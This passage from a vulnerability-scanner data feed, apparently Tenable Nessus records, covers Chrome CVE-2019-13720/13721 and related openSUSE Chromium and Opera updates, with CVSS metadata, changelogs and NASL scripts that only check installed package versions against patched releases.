script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-78.0.3904.87-lp151.2.42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-debuginfo-78.0.3904.87-lp151.2.42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-78.0.3904.87-lp151.2.42.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debuginfo-78.0.3904.87-lp151.2.42.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debugsource-78.0.3904.87-lp151.2.42.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:29:34", "description": "The version of Google Chrome installed on the remote Windows host is prior to 78.0.3904.87. It is, therefore, affected by multiple vulnerabilities as referenced in the 2019_10_stable-channel-update-for-desktop_31 advisory. \n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-01T00:00:00", "type": "nessus", "title": "Google Chrome < 78.0.3904.87 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_78_0_3904_87.NASL", "href": "https://www.tenable.com/plugins/nessus/130463", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130463);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"Google Chrome < 78.0.3904.87 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 78.0.3904.87. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2019_10_stable-channel-update-for-desktop_31 advisory. \n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?03df45ca\");\n # https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?af3000b1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1013868\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1019226\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 78.0.3904.87 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-13721\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\ninstalls = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'78.0.3904.87', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:49:52", "description": "The version of Google Chrome installed on the remote Windows host is prior to 78.0.3904.87. It is, therefore, affected by multiple vulnerabilities as referenced in the 2019_10_stable-channel-update-for-desktop_31 advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-03-26T00:00:00", "type": "nessus", "title": "Google Chrome < 78.0.3904.87 Multiple Use-After-Free ", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2019-03-26T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "701236.PRM", "href": "https://www.tenable.com/plugins/nnm/701236", "sourceData": "Binary data 701236.prm", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-12T15:31:50", "description": "This update for opera fixes the following issues :\n\nOpera was updated to version 65.0.3467.62\n\n - CHR-7658 Update chromium on desktop-stable-78-3467 to 78.0.3904.108\n\n - DNA-81387 Remove support for old bundle structure in signing scripts\n\n - DNA-81675 Update widevine signature localisation in signed packages\n\n - DNA-81884 [Advanced content blocking] Ads are blocked for whitelisted page in Incognito\n\n - DNA-82230 [Mac] URL is not correctly aligned when the Geolocation is ON\n\n - DNA-82368 Generating diffs for unsinged packages doesn’t work\n\n - DNA-82414 Wrong number of trackers displayed just after deactivating adblocker\n\n - DNA-82470 [Linux] Snap package doesn’t recognise GNOME 3.24 platform snap connection\n\n - DNA-82473 https://www.nba.com/standings not working with AdBlocker enabled\n\n - DNA-82484 Update content blocking icon\n\n - DNA-82485 [Mac 10.15] Opera installer error at the end of installation process\n\n - DNA-82508 [Adblocker] Predefault lists can not be unchecked\n\n - DNA-82557 Address bar dropdown launches HTTP GETs for every autocomplete\n\n - DNA-82596 Do not block first-party ‘trackers’\n\n - DNA-82616 Settings – Tracker Blocker – Add “Learn more” link\n\n - DNA-82626 [Win] High CPU usage due to media indicator animation\n\n - DNA-82647 Tab icons mixed after Tab closing\n\n - DNA-82742 Pages won’t load after closing private mode\n\n - DNA-82768 Mark also the reference group in “exp” header for DNA-81658\n\n - DNA-82840 Disable favicon fetching for typed URLs\n\nComplete Opera 65.0 changelog at :\n\nhttps://blogs.opera.com/desktop/changelog-for-65/\n\nUpdate to version 64.0.3417.92\n\n - DNA-81358 Wrong key color on extension popup in dark mode\n\n - DNA-82208 Cherry-pick CVE-2019-13721 and CVE-2019-13720\n\nUpdate to version 64.0.3417.83\n\n - DNA-79676 Use FFmpegDemuxer to demux ADTS\n\n - DNA-81010 Spinner takes a lot of cpu\n\n - DNA-81385 Keys on some popups in dark mode can’t be hovered\n\n - DNA-81494 [Mac] Snap onboarding doesn’t appear while the icon still flashes\n\n - DNA-82003 Restore legacy path for AudioFileReader\n\n - DNA-82019 Enable #ffmpeg-demuxer-everywhere by default in developer\n\n - DNA-82028 Enable #ffmpeg-demuxer-everywhere by default in stable on macOS\n\nUpdate to version 64.0.3417.73\n\n - CHR-7598 Update chromium on desktop-stable-77-3417 to 77.0.3865.120\n\n - DNA-80049 The upper border of “Add to bookmarks bar” popup is cut off in white mode\n\n - DNA-80395 Menu popup borders in Settings are invisible in Dark mode\n\n - DNA-81263 Change the continue section buttons visibility as in description\n\n - DNA-81304 Crash at chrome::NewTab(Browser*)\n\n - DNA-81650 Easy Setup Style looks weird\n\n - DNA-81708 Missing dependency on //chrome/common:buildflags\n\n - DNA-81732 [Mac][Catalina] Cannot maximize a window after it’s been minimized\n\n - DNA-81737 Renderer crash on https://codesandbox.io/s/vanilla-ts\n\n - DNA-81753 Pinned tab only remembered after next restart\n\n - DNA-81769 Investigate reports about slow speed dial loading in O64 blog comments\n\n - DNA-81859 [Mac 10.15] Crash whenever navigating to any page\n\n - DNA-81893 Get Personalised news on SpeedDials broken layout\n\nUpdate to version 64.0.3417.61\n\n - DNA-80760 Sidebar Messenger icon update\n\n - DNA-81165 Remove sharing service\n\n - DNA-81211 [Advanced content blocking] Can not turn off ad blocking in private mode\n\n - DNA-81323 content_filter::RendererConfigProvider destroyed on wrong sequence\n\n - DNA-81487 [VPN disclaimer][da, ta] Text should be multiline\n\n - DNA-81545 opr-session entry for Google ads not working\n\n - DNA-81580 Speed dials’ colours change after Opera update\n\n - DNA-81597 [Adblocker] Google Ads link hides if clicking\n\n - DNA-81639 Widevine verification status is PLATFORM_TAMPERED\n\n - DNA-81237 [Advanced content blocking] noCoinis not enabled by default\n\n - DNA-81375 Adblocking_AddToWhitelist_Popup and Adblocking_RemoveFromWhitelist_Popup metric not recorded in stats\n\n - DNA-81413 Error in console when Start Page connects to My Flow\n\n - DNA-81435 Adjust VPN disclaimer to longer strings [de]\n\nUpdate to version 64.0.3417.47\n\n - DNA-80531 [Reborn3] Unify Switches\n\n - DNA-80738 “How to protect my privacy” link\n\n - DNA-81162 Enable #advanced-content-blocking on developer stream\n\n - DNA-81202 Privacy Protection popup doesn’t resize after enabling blockers\n\n - DNA-81230 [Mac] Drop support for 10.10\n\n - DNA-81280 Adjust button width to the shorter string\n\n - DNA-81295 Opera 64 translations\n\n - DNA-81346 Enable #advanced-content-blocking on all streams\n\n - DNA-81434 Turn on #new-vpn-flow in all streams\n\n - DNA-81436 Import translations from Chromium to O64\n\n - DNA-81460 Promote O64 to stable\n\n - DNA-81461 Snap onboarding is cut\n\n - DNA-81467 Integrate missing translations (Chinese, MS and TL) to O64/65\n\n - DNA-81489 Start page goes into infinite loop\n\nComplete Opera 64.0 changelog at:\nhttps://blogs.opera.com/desktop/changelog-for-64/\n\nUpdate to version 63.0.3368.94\n\n - CHR-7516 Update chromium on master to 78.0.3887.7\n\n - DNA-80966 [Linux] Integrate a new key into our packages\n\nUpdate to version 63.0.3368.88\n\n - DNA-79103 Saving link to bookmarks saves it to Other bookmarks folder\n\n - DNA-79455 Crash at views::MenuController::\n FindNextSelectableMenuItem(views::MenuItemView*, int, views:: MenuController::SelectionIncrementDirectionType, bool)\n\n - DNA-79579 Continuous packages using new_mac_bundle_structure do not run\n\n - DNA-79611 Update opauto_paths.py:GetResourcesDir\n\n - DNA-79621 Add support for new bundle structure to old autoupdate clients\n\n - DNA-79906 Fix package build\n\n - DNA-80131 Sign Opera Helper(GPU).app\n\n - DNA-80191 Fix opera_components/tracking_data/tracking_data_paths.cc\n\n - DNA-80638 Cherry-pick fix for CreditCardTest.\n UpdateFromImportedCard_ExpiredVerifiedCardUpdatedWithSam eName\n\n - DNA-80801 Very slow tab deletion process", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T00:00:00", "type": "nessus", "title": "openSUSE Security Update : opera (openSUSE-2019-2664)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2019-2664.NASL", "href": "https://www.tenable.com/plugins/nessus/131922", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-2664.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131922);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"openSUSE Security Update : opera (openSUSE-2019-2664)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for opera fixes the following issues :\n\nOpera was updated to version 65.0.3467.62\n\n - CHR-7658 Update chromium on desktop-stable-78-3467 to\n 78.0.3904.108\n\n - DNA-81387 Remove support for old bundle structure in\n signing scripts\n\n - DNA-81675 Update widevine signature localisation in\n signed packages\n\n - DNA-81884 [Advanced content blocking] Ads are blocked\n for whitelisted page in Incognito\n\n - DNA-82230 [Mac] URL is not correctly aligned when the\n Geolocation is ON\n\n - DNA-82368 Generating diffs for unsinged packages\n doesn’t work\n\n - DNA-82414 Wrong number of trackers displayed just after\n deactivating adblocker\n\n - DNA-82470 [Linux] Snap package doesn’t recognise\n GNOME 3.24 platform snap connection\n\n - DNA-82473 https://www.nba.com/standings not working with\n AdBlocker enabled\n\n - DNA-82484 Update content blocking icon\n\n - DNA-82485 [Mac 10.15] Opera installer error at the end\n of installation process\n\n - DNA-82508 [Adblocker] Predefault lists can not be\n unchecked\n\n - DNA-82557 Address bar dropdown launches HTTP GETs for\n every autocomplete\n\n - DNA-82596 Do not block first-party\n ‘trackers’\n\n - DNA-82616 Settings – Tracker Blocker – Add\n “Learn more” link\n\n - DNA-82626 [Win] High CPU usage due to media indicator\n animation\n\n - DNA-82647 Tab icons mixed after Tab closing\n\n - DNA-82742 Pages won’t load after closing private\n mode\n\n - DNA-82768 Mark also the reference group in\n “exp” header for DNA-81658\n\n - DNA-82840 Disable favicon fetching for typed URLs\n\nComplete Opera 65.0 changelog at :\n\nhttps://blogs.opera.com/desktop/changelog-for-65/\n\nUpdate to version 64.0.3417.92\n\n - DNA-81358 Wrong key color on extension popup in dark\n mode\n\n - DNA-82208 Cherry-pick CVE-2019-13721 and CVE-2019-13720\n\nUpdate to version 64.0.3417.83\n\n - DNA-79676 Use FFmpegDemuxer to demux ADTS\n\n - DNA-81010 Spinner takes a lot of cpu\n\n - DNA-81385 Keys on some popups in dark mode can’t\n be hovered\n\n - DNA-81494 [Mac] Snap onboarding doesn’t appear\n while the icon still flashes\n\n - DNA-82003 Restore legacy path for AudioFileReader\n\n - DNA-82019 Enable #ffmpeg-demuxer-everywhere by default\n in developer\n\n - DNA-82028 Enable #ffmpeg-demuxer-everywhere by default\n in stable on macOS\n\nUpdate to version 64.0.3417.73\n\n - CHR-7598 Update chromium on desktop-stable-77-3417 to\n 77.0.3865.120\n\n - DNA-80049 The upper border of “Add to bookmarks\n bar” popup is cut off in white mode\n\n - DNA-80395 Menu popup borders in Settings are invisible\n in Dark mode\n\n - DNA-81263 Change the continue section buttons visibility\n as in description\n\n - DNA-81304 Crash at chrome::NewTab(Browser*)\n\n - DNA-81650 Easy Setup Style looks weird\n\n - DNA-81708 Missing dependency on\n //chrome/common:buildflags\n\n - DNA-81732 [Mac][Catalina] Cannot maximize a window after\n it’s been minimized\n\n - DNA-81737 Renderer crash on\n https://codesandbox.io/s/vanilla-ts\n\n - DNA-81753 Pinned tab only remembered after next restart\n\n - DNA-81769 Investigate reports about slow speed dial\n loading in O64 blog comments\n\n - DNA-81859 [Mac 10.15] Crash whenever navigating to any\n page\n\n - DNA-81893 Get Personalised news on SpeedDials broken\n layout\n\nUpdate to version 64.0.3417.61\n\n - DNA-80760 Sidebar Messenger icon update\n\n - DNA-81165 Remove sharing service\n\n - DNA-81211 [Advanced content blocking] Can not turn off\n ad blocking in private mode\n\n - DNA-81323 content_filter::RendererConfigProvider\n destroyed on wrong sequence\n\n - DNA-81487 [VPN disclaimer][da, ta] Text should be\n multiline\n\n - DNA-81545 opr-session entry for Google ads not working\n\n - DNA-81580 Speed dials’ colours change after Opera\n update\n\n - DNA-81597 [Adblocker] Google Ads link hides if clicking\n\n - DNA-81639 Widevine verification status is\n PLATFORM_TAMPERED\n\n - DNA-81237 [Advanced content blocking] noCoinis not\n enabled by default\n\n - DNA-81375 Adblocking_AddToWhitelist_Popup and\n Adblocking_RemoveFromWhitelist_Popup metric not recorded\n in stats\n\n - DNA-81413 Error in console when Start Page connects to\n My Flow\n\n - DNA-81435 Adjust VPN disclaimer to longer strings [de]\n\nUpdate to version 64.0.3417.47\n\n - DNA-80531 [Reborn3] Unify Switches\n\n - DNA-80738 “How to protect my privacy” link\n\n - DNA-81162 Enable #advanced-content-blocking on developer\n stream\n\n - DNA-81202 Privacy Protection popup doesn’t resize\n after enabling blockers\n\n - DNA-81230 [Mac] Drop support for 10.10\n\n - DNA-81280 Adjust button width to the shorter string\n\n - DNA-81295 Opera 64 translations\n\n - DNA-81346 Enable #advanced-content-blocking on all\n streams\n\n - DNA-81434 Turn on #new-vpn-flow in all streams\n\n - DNA-81436 Import translations from Chromium to O64\n\n - DNA-81460 Promote O64 to stable\n\n - DNA-81461 Snap onboarding is cut\n\n - DNA-81467 Integrate missing translations (Chinese, MS\n and TL) to O64/65\n\n - DNA-81489 Start page goes into infinite loop\n\nComplete Opera 64.0 changelog at:\nhttps://blogs.opera.com/desktop/changelog-for-64/\n\nUpdate to version 63.0.3368.94\n\n - CHR-7516 Update chromium on master to 78.0.3887.7\n\n - DNA-80966 [Linux] Integrate a new key into our packages\n\nUpdate to version 63.0.3368.88\n\n - DNA-79103 Saving link to bookmarks saves it to Other\n bookmarks folder\n\n - DNA-79455 Crash at views::MenuController::\n FindNextSelectableMenuItem(views::MenuItemView*, int,\n views:: MenuController::SelectionIncrementDirectionType,\n bool)\n\n - DNA-79579 Continuous packages using\n new_mac_bundle_structure do not run\n\n - DNA-79611 Update opauto_paths.py:GetResourcesDir\n\n - DNA-79621 Add support for new bundle structure to old\n autoupdate clients\n\n - DNA-79906 Fix package build\n\n - DNA-80131 Sign Opera Helper(GPU).app\n\n - DNA-80191 Fix\n opera_components/tracking_data/tracking_data_paths.cc\n\n - DNA-80638 Cherry-pick fix for CreditCardTest.\n UpdateFromImportedCard_ExpiredVerifiedCardUpdatedWithSam\n eName\n\n - DNA-80801 Very slow tab deletion process\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.opera.com/desktop/changelog-for-64/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.opera.com/desktop/changelog-for-65/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://codesandbox.io/s/vanilla-ts\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nba.com/standings\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected opera package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-13721\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"opera-65.0.3467.62-lp151.2.9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"opera\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:13", "description": "This update for chromium fixes the following issues :\n\nUpdate to 89.0.4389.72 (boo#1182358, boo#1182960) :\n\n - CVE-2021-21159: Heap buffer overflow in TabStrip.\n\n - CVE-2021-21160: Heap buffer overflow in WebAudio.\n\n - CVE-2021-21161: Heap buffer overflow in TabStrip.\n\n - CVE-2021-21162: Use after free in WebRTC.\n\n - CVE-2021-21163: Insufficient data validation in Reader Mode.\n\n - CVE-2021-21164: Insufficient data validation in Chrome for iOS.\n\n - CVE-2021-21165: Object lifecycle issue in audio.\n\n - CVE-2021-21166: Object lifecycle issue in audio.\n\n - CVE-2021-21167: Use after free in bookmarks.\n\n - CVE-2021-21168: Insufficient policy enforcement in appcache.\n\n - CVE-2021-21169: Out of bounds memory access in V8.\n\n - CVE-2021-21170: Incorrect security UI in Loader.\n\n - CVE-2021-21171: Incorrect security UI in TabStrip and Navigation.\n\n - CVE-2021-21172: Insufficient policy enforcement in File System API.\n\n - CVE-2021-21173: Side-channel information leakage in Network Internals.\n\n - CVE-2021-21174: Inappropriate implementation in Referrer.\n\n - CVE-2021-21175: Inappropriate implementation in Site isolation.\n\n - CVE-2021-21176: Inappropriate implementation in full screen mode.\n\n - CVE-2021-21177: Insufficient policy enforcement in Autofill.\n\n - CVE-2021-21178: Inappropriate implementation in Compositing.\n\n - CVE-2021-21179: Use after free in Network Internals.\n\n - CVE-2021-21180: Use after free in tab search.\n\n - CVE-2020-27844: Heap buffer overflow in OpenJPEG.\n\n - CVE-2021-21181: Side-channel information leakage in autofill.\n\n - CVE-2021-21182: Insufficient policy enforcement in navigations.\n\n - CVE-2021-21183: Inappropriate implementation in performance APIs.\n\n - CVE-2021-21184: Inappropriate implementation in performance APIs.\n\n - CVE-2021-21185: Insufficient policy enforcement in extensions.\n\n - CVE-2021-21186: Insufficient policy enforcement in QR scanning.\n\n - CVE-2021-21187: Insufficient data validation in URL 